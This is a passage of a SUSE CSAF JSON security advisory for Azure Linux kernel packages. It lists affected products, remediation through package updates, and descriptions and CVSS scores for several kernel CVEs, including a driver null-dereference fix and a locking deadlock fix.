"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71141 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71143 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23010 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23010/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-12T11:26:05Z",
"generator": {
"date": "2026-02-12T11:26:05Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:0472-1",
"initial_release_date": "2026-02-12T11:26:05Z",
"revision_history": [
{
"date": "2026-02-12T11:26:05Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "cluster-md-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product_id": "cluster-md-kmp-azure-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "dlm-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product_id": "dlm-kmp-azure-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "gfs2-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product_id": "gfs2-kmp-azure-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "kernel-azure-6.4.0-150700.20.27.1.aarch64",
"product_id": "kernel-azure-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"product_id": "kernel-azure-devel-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-extra-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "kernel-azure-extra-6.4.0-150700.20.27.1.aarch64",
"product_id": "kernel-azure-extra-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-azure-optional-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "kernel-azure-optional-6.4.0-150700.20.27.1.aarch64",
"product_id": "kernel-azure-optional-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"product_id": "kernel-syms-azure-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "kselftests-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product_id": "kselftests-kmp-azure-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "ocfs2-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product_id": "ocfs2-kmp-azure-6.4.0-150700.20.27.1.aarch64"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product": {
"name": "reiserfs-kmp-azure-6.4.0-150700.20.27.1.aarch64",
"product_id": "reiserfs-kmp-azure-6.4.0-150700.20.27.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"product": {
"name": "kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"product_id": "kernel-devel-azure-6.4.0-150700.20.27.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"product": {
"name": "kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"product_id": "kernel-source-azure-6.4.0-150700.20.27.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "cluster-md-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product_id": "cluster-md-kmp-azure-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "dlm-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product_id": "dlm-kmp-azure-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "gfs2-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product_id": "gfs2-kmp-azure-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "kernel-azure-6.4.0-150700.20.27.1.x86_64",
"product_id": "kernel-azure-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"product_id": "kernel-azure-devel-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-extra-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "kernel-azure-extra-6.4.0-150700.20.27.1.x86_64",
"product_id": "kernel-azure-extra-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-optional-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "kernel-azure-optional-6.4.0-150700.20.27.1.x86_64",
"product_id": "kernel-azure-optional-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-azure-vdso-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "kernel-azure-vdso-6.4.0-150700.20.27.1.x86_64",
"product_id": "kernel-azure-vdso-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-syms-azure-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "kernel-syms-azure-6.4.0-150700.20.27.1.x86_64",
"product_id": "kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "kselftests-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product_id": "kselftests-kmp-azure-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "ocfs2-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product_id": "ocfs2-kmp-azure-6.4.0-150700.20.27.1.x86_64"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product": {
"name": "reiserfs-kmp-azure-6.4.0-150700.20.27.1.x86_64",
"product_id": "reiserfs-kmp-azure-6.4.0-150700.20.27.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-public-cloud:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-6.4.0-150700.20.27.1.aarch64 as component of SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64"
},
"product_reference": "kernel-azure-6.4.0-150700.20.27.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-6.4.0-150700.20.27.1.x86_64 as component of SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64"
},
"product_reference": "kernel-azure-6.4.0-150700.20.27.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-devel-6.4.0-150700.20.27.1.aarch64 as component of SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64"
},
"product_reference": "kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-devel-6.4.0-150700.20.27.1.x86_64 as component of SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64"
},
"product_reference": "kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-azure-6.4.0-150700.20.27.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch"
},
"product_reference": "kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-azure-6.4.0-150700.20.27.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch"
},
"product_reference": "kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-azure-6.4.0-150700.20.27.1.aarch64 as component of SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64"
},
"product_reference": "kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-azure-6.4.0-150700.20.27.1.x86_64 as component of SUSE Linux Enterprise Module for Public Cloud 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
},
"product_reference": "kernel-syms-azure-6.4.0-150700.20.27.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Public Cloud 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-53714",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53714"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/stm: ltdc: fix late dereference check\n\nIn ltdc_crtc_set_crc_source(), struct drm_crtc was dereferenced in a\ncontainer_of() before the pointer check. This could cause a kernel panic.\n\nFix this smatch warning:\ndrivers/gpu/drm/stm/ltdc.c:1124 ltdc_crtc_set_crc_source() warn: variable dereferenced before check \u0027crtc\u0027 (see line 1119)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53714",
"url": "https://www.suse.com/security/cve/CVE-2023-53714"
},
{
"category": "external",
"summary": "SUSE Bug 1254465 for CVE-2023-53714",
"url": "https://bugzilla.suse.com/1254465"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2023-53714"
},
{
"cve": "CVE-2023-54013",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54013"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Fix locking for runpm vs reclaim\n\nFor cases where icc_bw_set() can be called in callbaths that could\ndeadlock against shrinker/reclaim, such as runpm resume, we need to\ndecouple the icc locking. Introduce a new icc_bw_lock for cases where\nwe need to serialize bw aggregation and update to decouple that from\npaths that require memory allocation such as node/link creation/\ndestruction.\n\nFixes this lockdep splat:\n\n ======================================================\n WARNING: possible circular locking dependency detected\n 6.2.0-rc8-debug+ #554 Not tainted\n ------------------------------------------------------\n ring0/132 is trying to acquire lock:\n ffffff80871916d0 (\u0026gmu-\u003elock){+.+.}-{3:3}, at: a6xx_pm_resume+0xf0/0x234\n\n but task is already holding lock:\n ffffffdb5aee57e8 (dma_fence_map){++++}-{0:0}, at: msm_job_run+0x68/0x150\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #4 (dma_fence_map){++++}-{0:0}:\n __dma_fence_might_wait+0x74/0xc0\n dma_resv_lockdep+0x1f4/0x2f4\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}:\n fs_reclaim_acquire+0x80/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n topology_parse_cpu_capacity+0x8c/0x178\n get_cpu_for_node+0x88/0xc4\n parse_cluster+0x1b0/0x28c\n parse_cluster+0x8c/0x28c\n init_cpu_topology+0x168/0x188\n smp_prepare_cpus+0x24/0xf8\n kernel_init_freeable+0x18c/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #2 (fs_reclaim){+.+.}-{0:0}:\n __fs_reclaim_acquire+0x3c/0x48\n fs_reclaim_acquire+0x54/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n kzalloc.constprop.0+0x14/0x20\n icc_node_create_nolock+0x4c/0xc4\n icc_node_create+0x38/0x58\n qcom_icc_rpmh_probe+0x1b8/0x248\n platform_probe+0x70/0xc4\n really_probe+0x158/0x290\n __driver_probe_device+0xc8/0xe0\n driver_probe_device+0x44/0x100\n __driver_attach+0xf8/0x108\n bus_for_each_dev+0x78/0xc4\n driver_attach+0x2c/0x38\n bus_add_driver+0xd0/0x1d8\n driver_register+0xbc/0xf8\n __platform_driver_register+0x30/0x3c\n qnoc_driver_init+0x24/0x30\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #1 (icc_lock){+.+.}-{3:3}:\n __mutex_lock+0xcc/0x3c8\n mutex_lock_nested+0x30/0x44\n icc_set_bw+0x88/0x2b4\n _set_opp_bw+0x8c/0xd8\n _set_opp+0x19c/0x300\n dev_pm_opp_set_opp+0x84/0x94\n a6xx_gmu_resume+0x18c/0x804\n a6xx_pm_resume+0xf8/0x234\n adreno_runtime_resume+0x2c/0x38\n pm_generic_runtime_resume+0x30/0x44\n __rpm_callback+0x15c/0x174\n rpm_callback+0x78/0x7c\n rpm_resume+0x318/0x524\n __pm_runtime_resume+0x78/0xbc\n adreno_load_gpu+0xc4/0x17c\n msm_open+0x50/0x120\n drm_file_alloc+0x17c/0x228\n drm_open_helper+0x74/0x118\n drm_open+0xa0/0x144\n drm_stub_open+0xd4/0xe4\n chrdev_open+0x1b8/0x1e4\n do_dentry_open+0x2f8/0x38c\n vfs_open+0x34/0x40\n path_openat+0x64c/0x7b4\n do_filp_open+0x54/0xc4\n do_sys_openat2+0x9c/0x100\n do_sys_open+0x50/0x7c\n __arm64_sys_openat+0x28/0x34\n invoke_syscall+0x8c/0x128\n el0_svc_common.constprop.0+0xa0/0x11c\n do_el0_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54013",
"url": "https://www.suse.com/security/cve/CVE-2023-54013"
},
{
"category": "external",
"summary": "SUSE Bug 1256280 for CVE-2023-54013",
"url": "https://bugzilla.suse.com/1256280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2023-54013"
},
{
"cve": "CVE-2024-27005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-27005"
}
],
"notes": [
{
"category": "general",
